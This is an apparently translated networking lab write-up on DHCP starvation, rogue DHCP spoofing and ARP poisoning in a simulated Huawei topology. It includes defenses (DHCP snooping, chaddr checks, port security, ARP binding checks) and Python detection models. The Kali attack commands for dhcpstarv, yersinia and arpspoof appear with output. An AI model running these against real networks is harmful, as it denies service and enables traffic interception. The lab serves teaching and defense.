1.1 Starvation attack: exhausting the DHCP address pool
Figure 1-1 DHCP attack network topology
1. Configure the DHCP server on R1
dhcp enable
interface GigabitEthernet0/0/0
ip address 192.168.100.1 255.255.255.240
dhcp select interface
# View address pool information
display ip pool
Pool-name : GigabitEthernet0/0/0/0
Pool-No : 0
Position : Interface Status : Unlocked
Gateway-0 : 192.168.100.1
Mask : 255.255.255.240
VPN instance : --
IP address Statistic
Total :13
Used :0 Idle :13
Expired :0 Conflict :0 Disable :0
# View address pool details
display ip pool interface GigabitEthernet0/0/0/0
Pool-name : GigabitEthernet0/0/0/0
Pool-No : 0
Lease : 1 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Interface Status : Unlocked
Gateway-0 : 192.168.100.1
Mask : 255.255.255.240
VPN instance : --
Start End Total Used Idle(Expired) Conflict Disable
192.168.100.1 192.168.100.14 13 0 13(0) 0 0
# View all address pool details
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 - - Idle
2 192.168.100.3 - - Idle
3 192.168.100.4 - - Idle
4 192.168.100.5 - - Idle
5 192.168.100.6 - - Idle
6 192.168.100.7 - - Idle
7 192.168.100.8 - - Idle
8 192.168.100.9 - - Idle
9 192.168.100.10 - - Idle
10 192.168.100.11 - - Idle
11 192.168.100.12 - - Idle
12 192.168.100.13 - - Idle
13 192.168.100.14 - - Idle
2. Set the PC to obtain an IP address automatically
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:
3. View all address pool details on the router
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 - - Idle
2 192.168.100.3 - - Idle
3 192.168.100.4 - - Idle
4 192.168.100.5 - - Idle
5 192.168.100.6 - - Idle
6 192.168.100.7 - - Idle
7 192.168.100.8 - - Idle
8 192.168.100.9 - - Idle
9 192.168.100.10 - - Idle
10 192.168.100.11 - - Idle
11 192.168.100.12 - - Idle
12 192.168.100.13 - - Idle
13 192.168.100.14 5489-98e4-1890 36 Used
4. Connect the Kali server to the cloud device
5. SW1 configuration
# Disable spanning tree on SW1
stp disable
# Restart the DHCP service on the DHCP-SERVER
interface GigabitEthernet0/0/0
undo dhcp select interface
dhcp select interface
6. Launch the attack from Kali
# View network information
┌──(root💀kali)-[~/Desktop]
└─# ip addr
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e2:b3:fe brd ff:ff:ff:ff:ff:ff
inet 192.168.8.137/24 brd 192.168.8.255 scope global dynamic eth1
valid_lft 1160sec preferred_lft 1160sec
# Launch the DHCP attack
┌──(root💀kali)-[~/Desktop]
└─# dhcpstarv -i eth0
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.14 for 00:16:36:65:6f:03 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.13 for 00:16:36:0c:1d:5d from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.12 for 00:16:36:06:7f:cb from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.11 for 00:16:36:25:b5:f5 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.10 for 00:16:36:c9:e4:20 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.9 for 00:16:36:37:b0:87 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.8 for 00:16:36:b5:46:df from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.7 for 00:16:36:d1:d9:23 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.6 for 00:16:36:2f:78:c4 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.5 for 00:16:36:dc:d5:4a from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.4 for 00:16:36:35:dd:bd from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.3 for 00:16:36:cb:83:5c from 192.168.100.1
16:34:45 07/20/23: no network mask option in DHCPOFFER
16:34:45 07/20/23: got address 192.168.100.2 for 00:16:36:6e:8c:97 from 192.168.100.1
7. View address information on the DHCP server
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 0016-366e-8c97 106 Used
2 192.168.100.3 0016-36cb-835c 106 Used
3 192.168.100.4 0016-3635-ddbd 106 Used
4 192.168.100.5 0016-36dc-d54a 107 Used
5 192.168.100.6 0016-362f-78c4 107 Used
6 192.168.100.7 0016-36d1-d923 107 Used
7 192.168.100.8 0016-36b5-46df 107 Used
8 192.168.100.9 0016-3637-b087 107 Used
9 192.168.100.10 0016-36c9-e420 107 Used
10 192.168.100.11 0016-3625-b5f5 107 Used
11 192.168.100.12 0016-3606-7fcb 107 Used
12 192.168.100.13 0016-360c-1d5d 107 Used
13 192.168.100.14 0016-3665-6f03 119 Used
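The pool listing above is what a defender has to work with when the server side is the only vantage point. As an added example (not part of the original lab), the following parses rows in the "display ip pool ... all" format and flags the two signs visible in the lab output: the pool is fully used, and all leases share one vendor prefix (OUI 00-16-36) and were issued within seconds of each other. The interpretation of the numeric column as a lease timer is an assumption.

```python
import re
from collections import Counter

# Sample rows in the format of "display ip pool interface ... all", copied from the
# lab output above (index, IP, MAC, lease column, status). Constructed for this example.
POOL_OUTPUT = """\
1 192.168.100.2 0016-366e-8c97 106 Used
2 192.168.100.3 0016-36cb-835c 106 Used
3 192.168.100.4 0016-3635-ddbd 106 Used
4 192.168.100.5 0016-36dc-d54a 107 Used
5 192.168.100.6 0016-362f-78c4 107 Used
6 192.168.100.7 0016-36d1-d923 107 Used
7 192.168.100.8 0016-36b5-46df 107 Used
8 192.168.100.9 0016-3637-b087 107 Used
9 192.168.100.10 0016-36c9-e420 107 Used
10 192.168.100.11 0016-3625-b5f5 107 Used
11 192.168.100.12 0016-3606-7fcb 107 Used
12 192.168.100.13 0016-360c-1d5d 107 Used
13 192.168.100.14 0016-3665-6f03 119 Used
"""

ROW = re.compile(r"^\s*\d+\s+(\S+)\s+(\S+)\s+(\S+)\s+(Idle|Used)\s*$")

def parse_pool(text):
    """Turn the pool listing into dicts; '-' fields become None."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            ip, mac, lease, status = m.groups()
            rows.append({"ip": ip, "mac": None if mac == "-" else mac,
                         "lease": None if lease == "-" else int(lease), "status": status})
    return rows

def starvation_indicators(rows, oui_share=0.8, lease_window=60):
    """Flag a pool that is exhausted AND whose leases look machine-generated."""
    used = [r for r in rows if r["status"] == "Used"]
    report = {"total": len(rows), "used": len(used),
              "exhausted": bool(rows) and len(used) == len(rows)}
    # OUI clustering: Huawei prints MACs as 0016-366e-8c97, so the vendor prefix is chars 0-6.
    ouis = Counter(r["mac"][:7] for r in used if r["mac"])
    top_oui, top_n = ouis.most_common(1)[0] if ouis else (None, 0)
    report["dominant_oui"] = top_oui
    report["oui_clustered"] = bool(used) and top_n / len(used) >= oui_share
    # Burst (assumption: the column is a lease timer, so near-equal values mean same issue time).
    leases = [r["lease"] for r in used if r["lease"] is not None]
    report["burst"] = bool(leases) and max(leases) - min(leases) <= lease_window
    report["suspicious"] = report["exhausted"] and (report["oui_clustered"] or report["burst"])
    return report
```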
1.2 DHCP server spoofing attack
1. Spoofing attack
┌──(root💀kali)-[~/Desktop]
└─# yersinia -G
2. Packet capture
3. View the address on the PC
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.11.200
Subnet mask.......................: 255.255.255.0
Gateway...........................: 192.168.11.100
Physical address..................: 54-89-98-E4-18-90
DNS server........................: 192.168.11.100
1.3 DHCP attack defenses
1. Defending against DHCP server spoofing
1) Restore the DHCP service
interface GigabitEthernet0/0/0
[DHCP-SERVER-GigabitEthernet0/0/0]undo dhcp select interface
Warning: There are IP addresses allocated in the pool. Are you sure to delete the pool?[Y/N]:y
[DHCP-SERVER-GigabitEthernet0/0/0] dhcp select interface
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 - - Idle
2 192.168.100.3 - - Idle
3 192.168.100.4 - - Idle
4 192.168.100.5 - - Idle
5 192.168.100.6 - - Idle
6 192.168.100.7 - - Idle
7 192.168.100.8 - - Idle
8 192.168.100.9 - - Idle
9 192.168.100.10 - - Idle
10 192.168.100.11 - - Idle
11 192.168.100.12 - - Idle
12 192.168.100.13 - - Idle
13 192.168.100.14 - - Idle
2) Enable DHCP snooping and a trusted port on SW1
dhcp enable
dhcp snooping enable
vlan 1
dhcp snooping enable
# Add the trusted port (the uplink toward the legitimate DHCP server)
dhcp snooping trusted interface GigabitEthernet 0/0/2
3) View address information on the PC
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
2. Defending against DHCP starvation
1) Enable DHCP snooping plus dhcp snooping check chaddr on SW1 so that such messages are discarded
port-group 1
group-member GigabitEthernet 0/0/1 to GigabitEthernet 0/0/24
# Enable the dhcp snooping check function
dhcp snooping check dhcp-chaddr enable
# Enter G0/0/3 and check that the setting has been applied
interface GigabitEthernet0/0/3
dhcp snooping check dhcp-chaddr enable
2) Launch the dhcpstarv starvation attack
3) View DHCP information
If the Ethernet source MAC address differs from the chaddr field in the DHCP message, the message is treated as an attack; with DHCP snooping plus dhcp snooping check chaddr enabled, the switch discards it.
4) View address information on the PC
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:
3. Launch the yersinia attack
1) Yersinia DHCP DoS attack
In the Yersinia DHCP DoS attack the source MAC address and chaddr are identical, so this attack cannot be prevented by check-chaddr.
2) Defending by means of port security
Yersinia forges both the source MAC and chaddr, so the attack makes the switch port learn a large number of MAC addresses. On a single access interface of a switch only one MAC address is allowed to be learned; if more than one is learned, the port is penalised, and the penalty is to shut the interface down.
port-group 1
# Enable port security
port-security enable
# Set the maximum number of MAC addresses
port-security max-mac-num 1
# Enable the protection action (shutdown)
port-security protect-action shutdown
# After the shutdown action has triggered, the port must be re-enabled manually
interface GigabitEthernet 0/0/3
undo shutdown
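The two defenses above complement each other: check-chaddr catches dhcpstarv (real source MAC, forged chaddr) but not yersinia (source MAC and chaddr forged together), while port security with max-mac-num 1 catches yersinia. As an added example (not code from the lab or from Huawei), this Python model applies both rules to constructed frames; the Kali and PC MACs and the dhcpstarv chaddr values come from the lab output, the yersinia MACs are made up.

```python
from dataclasses import dataclass, field

@dataclass
class DhcpFrame:
    port: str       # ingress access port, e.g. "GE0/0/3"
    src_mac: str    # Ethernet source address
    chaddr: str     # client hardware address inside the DHCP payload

@dataclass
class AccessPort:
    max_mac: int = 1                        # port-security max-mac-num 1
    learned: set = field(default_factory=set)
    shutdown: bool = False                  # set by port-security protect-action shutdown

def chaddr_ok(frame):
    """dhcp snooping check dhcp-chaddr: pass only when the source MAC equals chaddr."""
    return frame.src_mac.lower() == frame.chaddr.lower()

def port_security_ok(port, frame):
    """Learn the source MAC; once more than max_mac addresses are seen, shut the port."""
    if port.shutdown:
        return False
    port.learned.add(frame.src_mac.lower())
    if len(port.learned) > port.max_mac:
        port.shutdown = True
        return False
    return True

def run_switch(frames):
    """Port security sees every frame first; the chaddr check then inspects DHCP content."""
    ports, verdicts = {}, []
    for f in frames:
        port = ports.setdefault(f.port, AccessPort())
        if not port_security_ok(port, f):
            verdicts.append("drop:port-security")
        elif not chaddr_ok(f):
            verdicts.append("drop:chaddr-mismatch")
        else:
            verdicts.append("forward")
    return verdicts, ports

KALI = "00:0c:29:e2:b3:f4"   # Kali eth0 in the lab
PC = "54:89:98:e4:18:90"     # the lab PC
# Constructed traffic. dhcpstarv keeps the real source MAC and forges only chaddr
# (chaddr values taken from its log above) ...
STARV = [DhcpFrame("GE0/0/3", KALI, c)
         for c in ("00:16:36:65:6f:03", "00:16:36:0c:1d:5d", "00:16:36:06:7f:cb")]
# ... whereas yersinia forges both, so src MAC == chaddr on every frame (MACs constructed).
YERSINIA = [DhcpFrame("GE0/0/3", m, m)
            for m in ("02:aa:00:00:00:01", "02:aa:00:00:00:02", "02:aa:00:00:00:03")]
LEGIT = [DhcpFrame("GE0/0/1", PC, PC)]
```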
1.4 ARP attack defenses
1. ARP attack
1) R2 configuration
interface GigabitEthernet0/0/0
ip address 192.168.11.101 24
ip route-static 0.0.0.0 0.0.0.0 192.168.11.199
ping 192.168.11.199
Reply from 192.168.11.199: bytes=56 Sequence=1 ttl=255 time=140 ms
display arp
192.168.11.101 5489-98e6-7f25 I - GE0/0/0
192.168.11.199 5489-9879-755b 20 D-0 GE0/0/0
2) R3 configuration
interface GigabitEthernet0/0/0
ip address 192.168.11.199 24
dis arp
192.168.11.199 5489-9879-755b I - GE0/0/0
192.168.11.101 5489-98e6-7f25 20 D-0 GE0/0/0
3) Disable port security on SW1
interface GigabitEthernet 0/0/3
undo port-security enable
4) Launch the dsniff (arpspoof) attack from Kali
┌──(root💀kali)-[~/Desktop]
└─# ip add
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
valid_lft forever preferred_lft forever
┌──(root💀kali)-[~/Desktop]
└─# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
┌──(root💀kali)-[~/Desktop]
└─# arpspoof -i eth0 -t 192.168.11.101 -r 192.168.11.199
0:c:29:e2:b3:f4 54:89:98:e6:7f:25 0806 42: arp reply 192.168.11.199 is-at 0:c:29:e2:b3:f4
0:c:29:e2:b3:f4 54:89:98:79:75:5b 0806 42: arp reply 192.168.11.101 is-at 0:c:29:e2:b3:f4
5) View the poisoned ARP table on R2
dis arp
192.168.11.101 5489-98e6-7f25 I - GE0/0/0
192.168.11.199 000c-29e2-b3f4 20 D-0 GE0/0/0
192.168.11.100 000c-29e2-b3f4 15 D-0 GE0/0/0
6) View the poisoned ARP table on R3
192.168.11.199 5489-9879-755b I - GE0/0/0
192.168.11.101 000c-29e2-b3f4 20 D-0 GE0/0/0
192.168.11.100 000c-29e2-b3f4 15 D-0 GE0/0/0
2. Defending against ARP man-in-the-middle attacks: defense technology DHCP snooping
1) Once DHCP snooping is enabled, the switch builds a DHCP snooping binding table with five elements (IP address, MAC address, VLAN, interface, and lease)
display dhcp snooping user-bind all
192.168.100.14 5489-98e4-1890 1 /-- /-- GE0/0/1 2023.07.21-12:35
2) Enable the ARP anti-attack command
# Enable under the VLAN
vlan 1
arp anti-attack check user-bind enable
# Enable under the interface
interface GigabitEthernet 0/0/3
arp anti-attack check user-bind enable
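The binding check works because the forged replies sent by arpspoof carry an IP/MAC pair that no snooping entry vouches for on that port. As an added example (not code from the lab or from Huawei), this Python model parses the user-bind row shown above and validates ARP packets against it; the Kali spoofed replies use the MAC and addresses from the arpspoof output. Hosts with fixed addresses such as R3 get no dynamic entry, so a constructed static binding for R3 is included (its port GE0/0/4 is an assumption).

```python
import re
from dataclasses import dataclass

def norm_mac(mac):
    """Normalise '5489-98e4-1890', '54:89:98:e4:18:90' or '0:c:29:e2:b3:f4' to 12 hex digits."""
    parts = re.split(r"[:-]", mac.lower())
    if len(parts) == 6:                       # colon form; arpspoof output drops leading zeros
        return "".join(p.zfill(2) for p in parts)
    return "".join(parts)                     # Huawei dotted-hex form

@dataclass(frozen=True)
class Binding:
    ip: str
    mac: str          # normalised
    vlan: int
    interface: str

def parse_user_bind(text):
    """Parse rows of 'display dhcp snooping user-bind all' (IP MAC VLAN /-- /-- IF lease)."""
    entries = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) >= 7 and cols[0].count(".") == 3:
            entries.append(Binding(cols[0], norm_mac(cols[1]), int(cols[2]), cols[5]))
    return entries

@dataclass(frozen=True)
class ArpPacket:
    interface: str    # ingress port
    vlan: int
    sender_ip: str    # ARP sender protocol address
    sender_mac: str   # ARP sender hardware address (the field arpspoof forges)

def arp_user_bind_check(pkt, bindings):
    """arp anti-attack check user-bind: pass only if IP, MAC, VLAN and port all match an entry."""
    key = (pkt.sender_ip, norm_mac(pkt.sender_mac), pkt.vlan, pkt.interface)
    return any((b.ip, b.mac, b.vlan, b.interface) == key for b in bindings)

# Binding learned from the lab (row copied from the display output above) ...
USER_BIND_OUTPUT = "192.168.100.14 5489-98e4-1890 1 /-- /-- GE0/0/1 2023.07.21-12:35\n"
# ... plus a constructed static entry for R3, which has a fixed address and therefore
# no dynamic binding (port GE0/0/4 is an assumption).
BINDINGS = parse_user_bind(USER_BIND_OUTPUT) + [
    Binding("192.168.11.199", norm_mac("5489-9879-755b"), 1, "GE0/0/4")]
```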